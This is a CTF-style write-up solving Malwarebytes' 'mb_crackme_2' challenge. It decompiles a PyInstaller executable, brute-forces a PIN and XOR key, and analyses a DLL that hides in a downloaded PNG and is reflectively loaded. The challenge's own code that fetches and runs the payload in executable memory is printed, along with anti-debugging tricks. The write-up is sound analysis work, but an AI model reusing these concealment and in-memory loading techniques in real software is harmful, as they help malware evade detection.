Malwarebytes challenge write-up

Malwarebytes published on April 27th a new reverse engineering challenge, an executable mixing malware behavior with a traditional crackme look. It came in the form of a Windows executable

This document describes the solving step of the challenge.

Lightweight analysis of “mb_crackme_2.exe”

As we would do with any real malware, we start by performing some basic information gathering on the provided executable. Even if the static and dynamic approaches gave us similar conclusions on the executable’s nature (see 2.4), the different methods have been described nonetheless in the following sections.

Basic static information gathering

Using Exeinfo PE, a maintained successor of the renowned (but outdated) PEiD software, gives us some basic information about the binary:

  •  The program is a 32 bits Portable Executable (PE), meant to be run in console (no GUI);
  •  It seems to be compiled from C++ using Microsoft Visual C++ 8;
  •  No obvious sign of packing is detected by the tool.

Output of Exeinfo PE

Looking for printable strings in the binary already gives us some hints about the executable’s nature:

$ strings -n 10 mb_crackme_2.exe_
[...]
pyi-windows-manifest-filename
[...]
Py_IgnoreEnvironmentFlag
Failed to get address for Py_IgnoreEnvironmentFlag
Py_NoSiteFlag
Failed to get address for Py_NoSiteFlag
Py_NoUserSiteDirectory
[...]
mpyimod01_os_path
mpyimod02_archive
mpyimod03_importers
spyiboot01_bootstrap
spyi_rth__tkinter
bCrypto.Cipher._AES.pyd
bCrypto.Hash._SHA256.pyd
bCrypto.Random.OSRNG.winrandom.pyd
bCrypto.Util._counter.pyd
bMicrosoft.VC90.CRT.manifest
bPIL._imaging.pyd
bPIL._imagingtk.pyd
[...]
opyi-windows-manifest-filename another.exe.manifest
[...]
zout00-PYZ.pyz
python27.dll

Many references to Python libraries, PYZ archives and “pyi” substring indicates the use of the PyInstaller utility to build a PE executable from a Python script.

Basic dynamic information gathering

Running the executable (in a sandboxed environment) gives us the following message:

Using Process Monitor, from SysInternals Tools Suite , allows us to quickly get a glimpse of the actions performed by the executable:

A temporary directory named “_MEI5282” is created under user’s “%temp%” directory, and filled with Python-related resources. In particular, “python27.dll” and “*.pyd” libraries are written and later loaded by the executable.

This behavior is typical of executables generated by PyInstaller.

Error-handling analysis

Without tools, it is often possible to quickly get information about a binary’s internals by testing its error handling. For example, inserting an EOF (End-Of-File) signal in the terminal (“Ctrl+Z + Return” on Windows Command Prompt) makes the program crash, printing the following information:
Python stack trace printed after a crash

This allows us to identify the presence of a Python program embedded inside the executable and gives us the name of the main script: another.py. The error message “[$PID] Failed to execute script $scriptName” is typical of PyInstaller-produced programs.

Python files extraction and decompilation

Every lightweight analysis presented previously points out that the executable has been built using PyInstaller.
The PyInstaller Extractor  program can be used to extract python-compiled resources from the executable.
$ python pyinstxtractor.py mb_crackme_2.exe
[*] Processing mb_crackme_2.exe
[*] Pyinstaller version: 2.1+
[*] Python version: 27
[*] Length of package: 8531014 bytes
[*] Found 931 files in CArchive
[*] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap
[+] Possible entry point: pyi_rth__tkinter
[+] Possible entry point: another
[*] Found 440 files in PYZ archive
[*] Successfully extracted pyinstaller archive: mb_crackme_2.exe

You can now use a python decompiler on the pyc files within the extracted directory

 

As previously seen, the most interesting file is “another”, as it should contain the “main” function.
Files extracted by PyInstaller Extractor

 

A quick Internet search  informs us that in a PYZ archive, the main file is in fact a *.pyc file (Python bytecode) from which the first 8 bytes, containing its signature, have been removed. Looking the hex dump of another *.pyc file of the archive confirms this statement and gives us the correct signature for Python 2.7 bytecode files (in purple).
$ hexdump -C another | head -n 3
00000000  63 00 00 00 00 00 00 00  00 03 00 00 00 40 00 00  |c............@..|
00000010  00 73 03 02 00 00 64 00  00 5a 00 00 64 01 00 5a  |.s....d..Z..d..Z|
00000020  01 00 64 02 00 5a 02 00  64 03 00 64 04 00 6c 03  |..d..Z..d..d..l.|
$ hexdump -C out00-PYZ.pyz_extracted/cmd.pyc | head -n 3
00000000  03 f3 0d 0a 00 00 00 00  63 00 00 00 00 00 00 00  |.ó......c.......|
00000010  00 03 00 00 00 40 00 00  00 73 4c 00 00 00 64 00  |.....@...sL...d.|
00000020  00 5a 00 00 64 01 00 64  02 00 6c 01 00 5a 01 00  |.Z..d..d..l..Z..|

Restoring the file’s signature produces a correct Python bytecode file.

$ cat <(printf "\x03\xf3\x0d\x0a\x00\x00\x00\x00") another > another.pyc
$ file another.pyc
another.pyc: python 2.7 byte-compiled
Using the uncompyle6  decompilation tool, we can easily recover the original source code of another.py.
$ uncompyle6 another.pyc > another.py

Stage 1: login

Looking at the main() function of another.py, we see that the first operations are performed by the stage1_login() function.
def main():
    key = stage1_login()
    if not check_if_next(key):
        return
    else:
        content = decode_and_fetch_url(key)
        if content is None:
            print 'Could not fetch the content'
            return -1
        decdata = get_encoded_data(content)
        if not is_valid_payl(decdata):
            return -3
        print colorama.Style.BRIGHT + colorama.Fore.CYAN
        print 'Level #2: Find the secret console...'
        print colorama.Style.RESET_ALL
        #load_level2(decdata, len(decdata))
        dump_shellcode(decdata, len(decdata))
        user32_dll.MessageBoxA(None, 'You did it, level up!', 'Congrats!', 0)
        try:
            if decode_pasted() == True:
                user32_dll.MessageBoxA(None, '''Congratulations! Now save your flag
and send it to Malwarebytes!''', 'You solved it!', 0)
                return 0
            user32_dll.MessageBoxA(None, 'See you later!', 'Game over', 0)
        except:
            print 'Error decoding the flag'
        return

def stage1_login():
    show_banner()
    print colorama.Style.BRIGHT + colorama.Fore.CYAN
    print 'Level #1: log in to the system!'
    print colorama.Style.RESET_ALL
    login = raw_input('login: ')
    password = getpass.getpass()
    if not (check_login(login) and check_password(password)):
        print 'Login failed. Wrong combination username/password'
        return None
    else:
        PIN = raw_input('PIN: ')
        try:
            key = get_url_key(int(PIN))
        except:
            print 'Login failed. The PIN is incorrect'
            return None
        if not check_key(key):
            print 'Login failed. The PIN is incorrect'
            return None
        return key

Three user inputs are successively checked: the user’s login, password and PIN code.

Finding the login

The check_login() function’s code is completely transparent :
def check_login(login):
    if login == 'hackerman':
        return True
    return False

We have found the login, let’s search for the password.

Expected login

Finding the password

The check_password() function hashes user’s input using the MD5 hash function, and compares the result with an hardcoded string:

def check_password(password):
    my_md5 = hashlib.md5(password).hexdigest()
    if my_md5 == '42f749ade7f9e195bf475f37a44cafcb':
        return True
    return False

A quick Internet search of this string gives us the corresponding cleartext password: Password123.

Finding the password on a search engine

Finding the PIN code

The PIN code is read from standard input, converted into an integer (cf. stage1_login() function), and passed to the get_url_key() function:


def get_url_key(my_seed):
    random.seed(my_seed)
    key = ‘’
    for I in xrange(0, 32):
        id = random.randint(0, 9)
        key += str(id)
    return key

This function derives a pseudo-random 32 digits key from the PIN code, using it as a seed for Python’s PRNG. The generated key is then verified using the check_key() function, where its MD5 sum is checked against another hardcoded value.


def check_key(key):
    my_md5 = hashlib.md5(key).hexdigest()
    if my_md5 == 'fb4b322c518e9f6a52af906e32aee955':
        return True
    return False

The key space is obviously too large to be brute-forced, as a 32-digits string corresponds to 10^32 (~2^106) possible combinations. However, we can brute-force the PIN code, being an integer, using the following code:


from another import get_url_key, check_key
PIN = 0
while True:
    key = get_url_key(PIN)
    if check_key(key):
        print PIN
        break
    PIN += 1

The solution is obtained in a few milliseconds:

$ python bruteforcePIN.py
9667

Testing credentials

Using the credentials found in the previous step completes the first stage of the challenge.

Validating stage 1

Clicking “Yes” makes the executable pause after printing the following message in the console:

Waiting for us to find a « secret console »

Let’s find that secret console!

Stage 2: the secret console

Payload download and decoding

Continuing our analysis of the main() function, the next function to be called after credentials verification is decode_and_fetch_url(), with the previously calculated 32-digits key given as argument:


def decode_and_fetch_url(key):
    try:
        encrypted_url = '\xa6\xfa\x8fO\xba\x7f\x9d\[...]\xfe'
        aes = AESCipher(bytearray(key))
        output = aes.decrypt(encrypted_url)
        full_url = output
        content = fetch_url(full_url)
    except:
        return None
    return content

A URL is decrypted using an AES cipher and the 32-digits key. The resource at this URL is then downloaded and its content returned by the function.
To get the decrypted URL, we simply add some logging instructions to the original code of another.py, which can be run independently of mb_crackme_2.exe (given that the required dependencies are present on our machine).

[...]
        full_url = output
        print "DEBUG : URL fetched is : %s " % full_url #added from original code
        content = fetch_url(full_url)
[...]

The result execution is the following:


login: hackerman
Password:
PIN: 9667
DEBUG : URL fetched is : https://i.imgur.com/dTHXed7.png

The decrypted URL hosts the PNG image displayed bellow:

Image downloaded by the executable

The “malware” then reads the Red, Green and Blue components of each of the image’s pixels, interprets them as bytes and constructs a buffer from their concatenation.

def get_encoded_data(bytes):
    imo = Image.open(io.BytesIO(bytes))
    rawdata = list(imo.getdata())
    tsdata = ''
    for x in rawdata:
        for z in x:
            tsdata += chr(z)
    del rawdata
    return tsdata

This technique is sometimes used by real malware to download malicious code without raising suspicion of traffic-analysis tools, hiding the real nature of the downloaded resource.
Using the “Extract data…” function of the Stegsolve tool  allows to quickly preview the data encoded in the image, which appears to be a PE file (and more specifically, a DLL):

Output of the stegsolve tool

The function is_valid_payl() is then used to check whether the decoded payload is correct:


def is_valid_payl(content):
    if get_word(content) != 23117:
        return False
    next_offset = get_dword(content[60:])
    next_hdr = content[next_offset:]
    if get_dword(next_hdr) != 17744:
        return False
    return True

The 23117 and 17744 constants represent the “MZ” and “PE” magic bytes present in the headers of a PE.


>>> import struct
>>> struct.pack("<H", 23117)
'MZ'
>>> struct.pack("<H", 17744)
'PE'

The decoded file is then passed to the load_level2() function, which is a wrapper around prepare_stage().

def load_level2(rawbytes, bytesread):
    try:
        if prepare_stage(rawbytes, bytesread):
            return True
    except:
        return False

def prepare_stage(content, content_size):
    virtual_buf = kernel_dll.VirtualAlloc(0, content_size, 12288, 64)
    if virtual_buf == 0:
        return False
    res = memmove(virtual_buf, content, content_size)
    if res == 0:
        return False
    MR = WINFUNCTYPE(c_uint)(virtual_buf + 2)
    MR()
    return True

This function starts by allocating enough space to store the downloaded code, using the VirtualAlloc API function call. The allocated space is readable, writable and executable, as the provided arguments reveal (12288 being equal to “MEM_COMMIT | MEM_RESERVE”, and 64 to PAGE_EXECUTE_READWRITE).
The downloaded code is then written in the allocated space using the memmove function, and executed like a shellcode from offset 2.

To get a clean dump of the downloaded code (once decrypted), we add a piece of code in the prepare_stage() function, as follows:

def prepare_stage(content, content_size):
    with open("dumped_pe.dll", "wb") as f:
        f.write(content[:content_size])
        print "DEBUG : File dumped in dumped_pe.dll"
    virtual_buf = kernel_dll.VirtualAlloc(0, content_size, 12288, 64)
    if virtual_buf == 0:
        return False
    res = memmove(virtual_buf, content, content_size)
    if res == 0:
        return False
    MR = WINFUNCTYPE(c_uint)(virtual_buf + 2)
    MR()
    return True

After re-executing the program, we observe that the obtained file is indeed a valid 32 bits Windows DLL:

$ file dumped_pe.dll
dumped_file.ext: PE32 executable (DLL) (console) Intel 80386, for MS Windows

Time for us to open our favorite disassembler !

Downloaded DLL’s reverse-engineering

Reflective loading
From the offset 2 of the file, a little shellcode located in the DOS headers transfers the execution to another code that implements Reflective DLL injection. This technique is used to load the library itself from memory, instead of normally loading the DLL from disk using the LoadLibrary API call.
 

Disassembly of the first bytes of the downloaded DLL

The reflective loader’s code, located at 0x6E0, is documented in Stephen Fewer’s GitHub  and will not be described in this write-up. Since, in the end, the library is loaded by this mechanism as it would be after a normal LoadLibrary call, this downloaded file will be analyzed like a standard DLL in the rest of this write-up.

The list of exported functions being empty (except for the DllEntryPoint function), we start our analysis at the entry point of the DLL.

Exports list

Entry point
Our first goal is to search for the DllMain() function from the entry point. If the reverser is not used to analyzing Windows DLLs, a simple way to start would be to open any random non-stripped 32bit DLL, which (with a little luck) would be compiled with the same compiler (Visual C++ ~7.10 here), and which would have a similar CFG structure for the DllEntryPoint function.
An example of CFG comparisons between the analyzed DLL (left) and another non-stripped 32bit DLL (right) is presented below:
 

DLLEntryPoints in our DLL v/s another non-stripped DLL
DllMainCTRStartup in our DLL / in another non-stripped DLL

This technique allows us to quickly find the DllMain function in our DLL, here being located at 0x10001170.
DllMain (0x10001170)
The function starts by checking if it has been called during the first load of the DLL by a process, by comparing the value of the fdwReason argument  against the DLL_PROCESS_ATTACH constant.
The DllMain() function then registers two exception handlers using the AddVectoredExceptionHandler  API call. The handlers are named “Handler_0” and “Handler_1” in the screenshot below:

DllMain function

An exception is then manually raised using the “int 3” interruption instruction, triggering the execution of Handler_0.
Interlude: debugging a DLL in IDA Pro
To make the reverse-engineering of some functions easier, debugging the code to observe function inputs and outputs can be an effective method.
One simple way to debug a DLL inside IDA is to load the file as usual, then go to “Debugger ->Process options…” and modify the following value:

  • Application:
    •  On a 64 bits version of Windows:
      •   “C:\Windows\SysWOW64\rundll32.exe” to debug a 32 bits library
      •   “C:\Windows\System32\rundll32.exe” to debug a 64 bits library
    •  On a 32 bits version of Windows:
      •   “C:\Windows\System32\rundll32.exe” to debug a 32 bits library
      •   Obviously, you cannot run (therefore debug) a 64 bits library on a 32 bits version of Windows
  •  Parameters:
    •   “PATH_OF_YOUR_DLL”,functionToCall [function parameters if any]

Note: The file extension must be “*.dll” for rundll32.exe to accept it.

IDA « Process options… » menu

To test the configuration, just place a breakpoint at the entry point of the DLL:

Placing a breakpoint on the entry point

Run your debugger (F9). If configured correctly, your debugger should break at the DLL entry point, allowing you to debug any DLL function

Handler_0 (0x10001260)
Looking at Handler_0’s CFG (given below), we see that the function calls two unknown functions (0x100092C0 and 0x1000E61D). To quickly identify these functions, let’s debug the DLL, and look at the functions inputs/outputs:

sub_100092C0

Function sub_100092C0() call

The function seems to take 3 arguments:

  • A buffer (here named “Value”);
  • A value (here 0);
  • The size of the buffer (here 0x104).

Let’s look at the buffer’s content before and after the function call:

« Value » buffer before and after the call

The function prototype and its side effects correspond to the memset function.

sub_1000E61D

Function sub_1000E61D() call

The function seems to take 4 arguments:

  • An integer (here the PID of the process);
  • A buffer (here named “Value”);
  • The size of the buffer (here 0x104);
  • A value (here 0xA, or 10).

Looking at the provided buffer’s content after the function call, we see that the representation in base 10 of the first integer passed in parameter is written in the provided buffer.

Value buffer after the call

The function prototype and its side effects correspond to the _itoa_s function .

Handler_0 whole CFG and pseudo-code
Here is the graph of the Handler_0 function:

CFG of function Handler_0()

This corresponds to the following pseudo code:

if isloaded(“python.dll”):
   pid = getpid()
else:
   pid = 0
setEnvironmentVariable(“mb_chall”, str(pid))
return EXCEPTION_CONTINUE_SEARCH

The function checks the presence of the python27.dll library (normally loaded by the main program mb_crackme_2.exe) in the process address space, and sets the “mb_chall” environment variable consequently.
This may be seen as an “anti-debug” trick, because running the DLL independently in a debugger makes the execution follow a different path.

Handler_1 (0x100011D0)
The code of this handler is quite self-explanatory, being similar to the previous handler’s code:

Once again, this corresponds to the following pseudo code:

if getpid() == int(getenv(“mb_chall”):
   tmp = 6
else:
   tmp = 1
exceptionInfo->Context._Eip += tmp
return EXCEPTION_CONTINUE_EXECUTION

After this handler, execution restarts at the address of original interruption (“int 3”) +1 or +6 (as presented in the pseudo-code above), whether performed checks pass or not.

We thus continue the analysis at the not_fail function (0x100010D0).

not_fail (0x100010D0)
The function only starts a thread and waits for it to terminate.

CFG of not_fail() function

The created thread executes the MainThread (0x10001110) function, where our analysis continues.

MainThread (0x10001110)
The function loops and calls the EnumWindows  API every second, which in turn calls the provided callback function (EnumWindowsCallback) on every window present on the desktop.

CFG of MainThread() function

EnumWindowsCallback function (0x10005750)
The function, called on each window, uses the SendMessageA  API with the WM_GETTEXT message to retrieve the window’s title.

SendMessageA() call in MainThread()

After being converted to C++ std::string, the substrings “Notepad” and “secret_console” are searched in the window’s title.

Strings « Notepad » and « secret_console » searched for in window title

If both substrings are present, the window’s title is replaced by the hardcoded string “Secret Console is waiting for the commands…”, using the SendMessageA API along with the WM_SETTEXT message. The window is placed to the foreground, using the ShowWindow API call.

Modification of the window’s title using SendMessageA()

The PID of the process corresponding to the window is then written in the “malware”’s console, and sub-windows of this window are enumerated, using the EnumChildWindows  API.The function EnumChildWindowsCallback (0x100034C0) is thus called on every sub-window.

EnumChildWindows() function call
 

EnumChildWindowsCallback function (0x100034C0)
This function gets the content of the sub-window using the SendMessageA API call:

SendMessageA() call in EnumChildWindowsCallback() function

The substring “dump_the_key” is then searched in the retrieved content:

Search for « dump_the_key »

If this string is found, this function calls a decryption routine decrypt_buffer() (0x100016F0) on a buffer (encrypted_buff), using the string “dump_the_key” as argument.

Decrypting a hardcoded buffer using « dump_the_key » as key

Then, the “malware” loads the actxprxy.dll library into the process memory space. The first 4096 bytes (i.e. the first memory page) of the library is made writable using the VirtualProtect API call, and the decrypted payload is written at this location.

Loading a library and writing the decrypted buffer at its location

Since the actxprxy.dll library is not used anywhere in the analyzed DLL after being re-written, it may be seen as a covert communication channel between the analyzed DLL and the main program mb_crackme_2.exe. After this, the function clears every allocated memory and exits. The created thread (see 4.2.6) therefore also exits, and the DllEntryPoint function call terminates, giving the control back to the main python script.

Triggering the secret console

As seen in the DLL analysis, to trigger the required conditions, a file named “secret_console – Notepad” is opened in a text editor. As such, the window title contains the mentioned substrings:

Opening a file named « secret_console_Notepad.txt » on Notepad++

As expected, the title of the window is changed to “Secret Console is waiting for the commands…” by the malware. Writing “dump_the_key” in the window validates the second stage.

Writing « dump_the_key » in the text editor

Stage 3: the colors

After validating the previous step, a message is printed on the console, asking the user to “guess a color”:

Level 3 Message

The three components (R, G and B) of a specific color, with values going from 0 to 255, need to be entered to validate this step.

Level 3 failed guess message

Understanding the code

Looking back at the another.py’s main() function code, it seems that the corresponding operations are performed inside the decode_pasted() function.


def main():
   [...]
      load_level2(decdata, len(decdata))
      user32_dll.MessageBoxA(None, 'You did it, level up!', 'Congrats!', 0)
      try:
         if decode_pasted() == True:
            user32_dll.MessageBoxA(None, '''Congratulations! Now save your flag and 
send it to Malwarebytes!''', 'You solved it!', 0)
            return 0
def decode_pasted():
    my_proxy = kernel_dll.GetModuleHandleA('actxprxy.dll')
    if my_proxy is None or my_proxy == 0:
        return False
    else:
        char_sum = 0
        arr1 = my_proxy
        str = ''
        while True:
            val = get_char(arr1)
            if val == '\x00':
                break
            char_sum += ord(val)
            str = str + val
            arr1 += 1

        print char_sum
        if char_sum != 52937:
            return False
        colors = level3_colors()
        if colors is None:
            return False
        val_arr = zlib.decompress(base64.b64decode(str))
        final_arr = dexor_data(val_arr, colors)
        try:
            exec final_arr
        except:
            print 'Your guess was wrong!'
            return False

        return True

 


def dexor_data(data, key):
    maxlen = len(data)
    keylen = len(key)
    decoded = ''
    for i in range(0, maxlen):
        val = chr(ord(data[i]) ^ ord(key[i % keylen]))
        decoded = decoded + val
    return decoded

def level3_colors():
    colorama.init()
    print colorama.Style.BRIGHT + colorama.Fore.CYAN
    print '''Level #3: Your flag is almost ready! But before it will be revealed
, you need to guess it's color (R,G,B)!'''
    print colorama.Style.RESET_ALL
    color_codes = ''
    while True:
        try:
            val_red = int(raw_input('R: '))
            val_green = int(raw_input('G: '))
            val_blue = int(raw_input('B: '))
            color_codes += chr(val_red)
            color_codes += chr(val_green)
            color_codes += chr(val_blue)
            break
        except:
            print 'Invalid color code! Color code must be an integer (0,255)'
    print 'Checking: RGB(%d,%d,%d)' % (val_red, val_green, val_blue)
    return color_codes

According to the decode_pasted() function, the decrypted buffer stored at the start of actxprxy.dll’s address space is read and:
base64-decoded;

  • zlib-decompressed;
  • XOR’ed against the user-provided colors values;
  • Executed by the Python exec function.

To start our cryptanalysis, we modify the decode_pasted() function to dump the val_arr buffer before the dexor_data() operation, and rerun another.py, providing all required credentials:

[...]
if colors is None:
   return False
val_arr = zlib.decompress(base64.b64decode(str))
with open("val_arr.bin", "wb") as f:
   f.write(val_arr)
   print "val_arr dumped !"
exit()
final_arr = dexor_data(val_arr, colors)
[...]

 

Dumping the XOR’ed array

Decrypting the val_arr buffer

Knowing that the buffer is a string passed to the “exec” Python statement after being decrypted, it should represent a valid Python source code.
To find the right key, the naïve solution would be to run a brute-force attack on all the possible “(R, G, B)” combinations, and look for printable solutions. This solution would need to perform 256^3 = 16’777’216 dexor_data() calls, which is feasible but inefficient.
Instead, we perform 3 independent brute-force attacks on each R, G and B component, therefore performing 256 x 3 = 768 dexor_data() calls. The 3 brute-force attacks are performed on different “slices” of the val_arr string (of each of stride 3). We then test each combination of potential values previously found for each component.
For example, if our 3 brute-force attacks indicate that:

  • R can take values 2 and 37,
  • G can take values 77 and 78,
  • and B can only take the value 3,

Then we test the combinations (2,77, 3), (37,77, 3), (2,78, 3) and (37,78, 3).

The following code implements our attack:


import string
import itertools
from colorama import *
from another import dexor_data

with open("val_arr.bin", "rb") as f:
    val_arr = f.read()

#lists of possible values for R, G and B
potential_solutions = [list(), list(), list()]
for color in range(3): # separate bruteforce on R, G and B
    for xor_value in range(256): #testing all potential values
        valid = True
        for b in val_arr[color::3]: #extracting one every 3 characters, from index 
        # "color" (i.e. extracting all characters xored by the same "color" value)
            if chr(ord(b) ^ xor_value) not in string.printable:
                valid = False
                break
        if valid:
            potential_solutions[color].append(xor_value)

print "Possible values for R, G and B :", potential_solutions

for colors in itertools.product(*potential_solutions):
    print "Testing ", colors
    plaintext = dexor_data(val_arr, map(chr, colors))
    print repr(plaintext)
    if not raw_input("Does it seems right ? [Y/n]\n").startswith("n"):
       print "Executing payload :"
       exec plaintext
       break

Executing this code gives us the solution instantly:

Decrypting the payload

The final flag appears in the console:


flag{"Things are not always what they seem; the first appearance 
deceives many; the intelligence of a few perceives what has been 
carefully hidden." - Phaedrus}

Conclusion

This challenge was very interesting to solve, because apart from being an original crackme, it also included various topics that could be found during a real malware analysis. These topics included:

  • DLL-rewriting techniques, here used as a kind of covert communication channel between a DLL and its main process;
  • “Non-obvious” anti-debugging tricks, like checking the presence of a known library in the process’ memory space to identify standalone DLL debugging;
  • Concealed malware downloading, using « harmless » formats (like PNG) to hide an executable payload from basic traffic analysis;
  • PyInstaller-based malware, (yes, sometimes malware writers can be lazy).

Thanks MalwareBytes for this entertaining challenge!

Back to top